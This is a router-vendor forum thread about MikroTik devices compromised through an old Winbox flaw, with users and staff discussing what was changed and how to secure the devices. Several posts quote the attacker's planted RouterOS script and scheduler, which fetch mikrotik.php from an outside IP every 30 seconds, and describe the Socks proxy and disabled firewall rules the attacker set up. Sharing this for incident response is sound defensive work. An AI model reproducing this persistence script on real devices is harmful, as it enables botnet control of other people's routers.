HI,

Normis, before you close this topic, im not interested in how they got in, but what they want.
As seen in topic viewtopic.php?f=9&t=137217 the past few days a vast number of non-up-to-date Mikrotik devices has been compromised.
(not blaming Mikrotik, we should have updated)

Like Normis stated at the last post, the hacker could have collected passwords way before hand and used them now.
We took the action to remove scripts, schedulers and disable IP>Socks, then use firewall filter to block all incoming WAN traffic from non-whitelisted sources and updated to 6.40.8.
I know that a clean Netinstall would be the best course of action, but we have devices spread over the whole of Europe, so that's easier said than done.

But i am wondering, what was the goal of this?
This is what i have found (not an hacking expert)
- Scheduler is used to run a script every 30 seconds
- Script is used to fetch mikrotik.php from several IP addresses
- There are different versions of the hack, or several steps, mostly i found script3_ under scripts, but i have also found script1_ in one occasion.
(deleted it, without proper examination.... sorry panic mode )
- The source where mikrotik.php was downloaded has gone, so no way to see what was in the mikrotik.php file.
- IP > Socks is set to enabled on port 4145
[edit] - All drop rules in firewall filters have been disabled
Thats all we found, anybody got anything else that we have missed?

So if they already had the login credentials, then what did they do with mikrotik.php?
And did it infect the device on a shell level? (does upgrading fix that if that would be the case)

Since taking above said steps, i have not noticed any strange behavior, but it has only been 24h.
Did anybody get further in what has exactly been changed in the devices?

Br,
Ammer

I used the following command in the dude to fix the sock changes made
[ros_command("/ip socks set enabled=no port=1080")]

I am also trying to enable all drop firewalls using
[ros_command("/ip firewall filter enable [/ip firewall filter find where action=drop]")]
but it doesn't work.
Anyone knows why?

if I run the command
/ip firewall filter enable [/ip firewall filter find where action=drop]
in the cli it works fine

I used the dude to apply it to all of the devices that I manage at once

I got the same problem, yesterday I found attempts of connections:
Exactly 8 tries like this: Login failure for user admin from 95.154.216.168 via winbox
And then this:
/system script
add name=script3_ owner=adminAC policy=\
ftp,reboot,read,write,policy,test,password,sensitive source="/tool fetch add\
ress=95.154.216.168 port=2008 src-path=/mikrotik.php mode=http keep-result=n\
o"
/system scheduler
add disabled=yes interval=30s name=schedule3_ on-event=script3_ policy=\
ftp,reboot,read,write,policy,test,password,sensitive start-time=startup

immediately, I change all passwords and users, change the Winbox port and add a whitelist for Winbox connections (My local network and my works public IP).
Does anyone have an idea of ​​what we could do in order to protect ourselves?

Greetings

I got the same problem, yesterday I found attempts of connections:
Exactly 8 tries like this: Login failure for user admin from 95.154.216.168 via winbox
And then this:
/system script
add name=script3_ owner=adminAC policy=\
ftp,reboot,read,write,policy,test,password,sensitive source="/tool fetch add\
ress=95.154.216.168 port=2008 src-path=/mikrotik.php mode=http keep-result=n\
o"
/system scheduler
add disabled=yes interval=30s name=schedule3_ on-event=script3_ policy=\
ftp,reboot,read,write,policy,test,password,sensitive start-time=startup

immediately, I change all passwords and users, change the Winbox port and add a whitelist for Winbox connections (My local network and my works public IP).
Does anyone have an idea of ​​what we could do in order to protect ourselves?

Greetings

It's a known exploit that was fixed months ago, all you have to do is what normis said:

1. Upgrade to 6.42.3
2. Change password after upgrade (not before)
3. Implement a good firewall according to https://wiki.mikrotik.com/wiki/Manual:S ... our_Router

The first topic is actually about something else, this is why I leave this topic open. But the posts below seem to ignore the original questions, so I must repeat myself:

Issue was fixed in March already.
https://blog.mikrotik.com

1. Upgrade to 6.42.3
2. Change password after upgrade (not before)
3. Implement a good firewall according to https://wiki.mikrotik.com/wiki/Manual:S ... our_Router

As to the original post, yes, it is a nice question. We currently don't have full picture of how this thing operates. You are welcome to research and post your ideas and findings.
All we currently know is what method it used to get inside your device and how to protect the device.

The first topic is actually about something else, this is why I leave this topic open. But the posts below seem to ignore the original questions, so I must repeat myself:

Issue was fixed in March already.
https://blog.mikrotik.com

1. Upgrade to 6.42.3
2. Change password after upgrade (not before)
3. Implement a good firewall according to https://wiki.mikrotik.com/wiki/Manual:S ... our_Router

As to the original post, yes, it is a nice question. We currently don't have full picture of how this thing operates. You are welcome to research and post your ideas and findings.
All we currently know is what method it used to get inside your device and how to protect the device.

Hi Normis,

You can close the topic, as it doesn't seem to get replies that are actually on-topic.
(I feel for your support staff, seeing the forum replies blatantly ignoring the update and password instruction while claiming new versions were hacked)

For as far as i can see the hack was preparing the units for use in a botnet.
The mikrotik.php file was non-exiting, but the fact that it was downloaded every 30 seconds suggests that whenever they wanted to attack they would post instruction in the mikrotik.php file and let the infected units execute these instructions.
I think IP>Socks was opened in order to provide a backdoor in case the firewall rules were tightened. (if i'm correct IP > Socks give you a way to bypass the firewall??)

Anyway we upgraded all our units to 6.40.8 and blocked all non-whitelisted traffic from WAN, and so far i have not seen any re-infected units. (user/password update we will do next)

Cheers.

Hi everybody
I thought the bug was closed in the 6.40.8 release
but today more than 30 RouterOS hacked though version 6.40.8 bugfix only and 6.42.6
i saw this

For some reason I do not see the picture, but I see the link, so I downloaded the picture.
Always upload picture to the site, click attachments button below.
.

Hi everybody
I thought the bug was closed in the 6.40.8 release
but today more than 30 RouterOS hacked though version 6.40.8 bugfix only and 6.42.6
i saw this

Possibly your device was compromised earlier, before you upgraded. They only logged in now. If they have your password, it doesn't matter what version you have.

Hi everybody
I thought the bug was closed in the 6.40.8 release
but today more than 30 RouterOS hacked though version 6.40.8 bugfix only and 6.42.6
i saw this

Possibly your device was compromised earlier, before you upgraded. They only logged in now. If they have your password, it doesn't matter what version you have.

no I'm sure about that
this happened six hours ago from now

How do you know that nobody connected a month ago also?

How do you know that nobody connected a month ago also?

because I upgraded the version a month ago and I always follow the router and I know very well my RouerOS
I always follow this bug from 6 month ago, and i know it , and i know the program can do this, but if i disable port www the program can't get the password and in 6.40.8 the bug solved,

today alot of routerOS hacked , i think there is new bug
if i can talking to you on the email i will give you some things

The fact is the following. The bug is fixed 100% but anyone can log in, if you did not correct the configuration that the hacker applied before your upgrade. This could have been 7 months ago even. You will not know about it. It is 99% likely that this person accessed your device before you upgraded it. There is no other explanation.

The fact is the following. The bug is fixed 100% but anyone can log in, if you did not correct the configuration that the hacker applied before your upgrade. This could have been 7 months ago even. You will not know about it. It is 99% likely that this person accessed your device before you upgraded it. There is no other explanation.

I hope so but believe me this happened after the upgrade
use script or scheduler or fetch is primitive, i can use trick much better than this to login winbox after change password or upgrade without feeling the owner of router
I have more than 200 Router Board , control it by cloud
i have a company , and my business depends on mikrotik RouterOS
Please email me or facebook
it@max-upgrade.com
https://www.facebook.com/profile.php?id=100001210286834

The fact is the following. The bug is fixed 100% but anyone can log in, if you did not correct the configuration that the hacker applied before your upgrade. This could have been 7 months ago even. You will not know about it. It is 99% likely that this person accessed your device before you upgraded it. There is no other explanation.

some RouterBorad found this traying login
he cant hack it because my password contains arabic characters
with arabic characters cant get password until from backup file without encrypt

this photo from yesterda

then i disabled port 2000 form tools Btest server
and i disabled the socks
and i exported backup and read all code, nothing bad
i don't know if will hacked after that

then i disabled port 2000 form tools Btest server
and i disabled the socks
and i exported backup and read all code, nothing bad
i don't know if will hacked after that

Hi ahmedalmi ,

If you want to make your routers secure, make sure you setup your firewall to only allow acces from known IP adresses or DNS records.
This way even if they have the passwords, the just cannot log on to the device.

And definitely do not leave bandwidth test server open on the internet! Looks like you had done that.

then i disabled port 2000 form tools Btest server
and i disabled the socks
and i exported backup and read all code, nothing bad
i don't know if will hacked after that

Hi ahmedalmi ,

If you want to make your routers secure, make sure you setup your firewall to only allow acces from known IP adresses or DNS records.
This way even if they have the passwords, the just cannot log on to the device.

hi sir
i know that but i haven't static ip on home for example - i want to login by cloud from anywhere
now i'm using sstp vpn to connect routeros with my labtop and i allow access just my ip address for sstp-client
but this is a little difficult with my customers

And definitely do not leave bandwidth test server open on the internet! Looks like you had done that.

of course
the default config is opened

No, default config has firewall on the internet port.

No, default config has firewall on the internet port.

i mean the default config of bandwidth-test port "2000" is opend
the firewall filter you talking about has exception for winbox port 8291
and the Vulnerability exploiting the Winbox port you said that
on last photo the version 6.40.9
and it may solve the problem

then i disabled port 2000 form tools Btest server
and i disabled the socks
and i exported backup and read all code, nothing bad
i don't know if will hacked after that

Hi ahmedalmi ,

If you want to make your routers secure, make sure you setup your firewall to only allow acces from known IP adresses or DNS records.
This way even if they have the passwords, the just cannot log on to the device.

hi sir
i know that but i haven't static ip on home for example - i want to login by cloud from anywhere
now i'm using sstp vpn to connect routeros with my labtop and i allow access just my ip address for sstp-client
but this is a little difficult with my customers

Hi,
If you have a RouterOS device at home, just enable IP>cloud and it will give you a DNS record you can use to whitelist your IP address.
We have a x86 RouterOS server running as SSTP server, with a blacklist script that blacklists IP addresses if they connect more than 3 times per 5 minutes.
And whitelists IP addresses that successfully connect a SSTP tunnel.
This way we can reach all our devices and only have 1 device that is connectable from the internet.

Another way is to limit winbox access from the internet bij allowing access only from certain IP's.
(@ Normis, winbox can only be limited by IP address, not by DNS... maybe nice feature to be able to limit Winbox to DNS records for people without static IP addresses)

then i disabled port 2000 form tools Btest server
and i disabled the socks
and i exported backup and read all code, nothing bad
i don't know if will hacked after that

Hi ahmedalmi ,

If you want to make your routers secure, make sure you setup your firewall to only allow acces from known IP adresses or DNS records.
This way even if they have the passwords, the just cannot log on to the device.

hi sir
i know that but i haven't static ip on home for example - i want to login by cloud from anywhere
now i'm using sstp vpn to connect routeros with my labtop and i allow access just my ip address for sstp-client
but this is a little difficult with my customers

Hi,
If you have a RouterOS device at home, just enable IP>cloud and it will give you a DNS record you can use to whitelist your IP address.
We have a x86 RouterOS server running as SSTP server, with a blacklist script that blacklists IP addresses if they connect more than 3 times per 5 minutes.
And whitelists IP addresses that successfully connect a SSTP tunnel.
This way we can reach all our devices and only have 1 device that is connectable from the internet.

Another way is to limit winbox access from the internet bij allowing access only from certain IP's.
(@ Normis, winbox can only be limited by IP address, not by DNS... maybe nice feature to be able to limit Winbox to DNS records for people without static IP addresses)

you right , but on home i haven't rouerOS and my customers want to login by cloud from android sometime using 3g or 4g
its a little difficult like i said

about winbox can only be limited by IP address, not by DNS , you can use scheduler to resolve dns and set it on winbox service ip address

if you don't want to mess with VPN clients, than use port knock.
There are (free) clients for almost any platform. Just send some packets in specific order, and it will open up the ports FOR YOU for the time you specifed.

No, default config has firewall on the internet port.

i mean the default config of bandwidth-test port "2000" is opend
the firewall filter you talking about has exception for winbox port 8291
and the Vulnerability exploiting the Winbox port you said that
on last photo the version 6.40.9
and it may solve the problem

No, it is not open on the internet port. Default firewall blocks ALL incoming traffic from internet, it also blocks bandwidth test.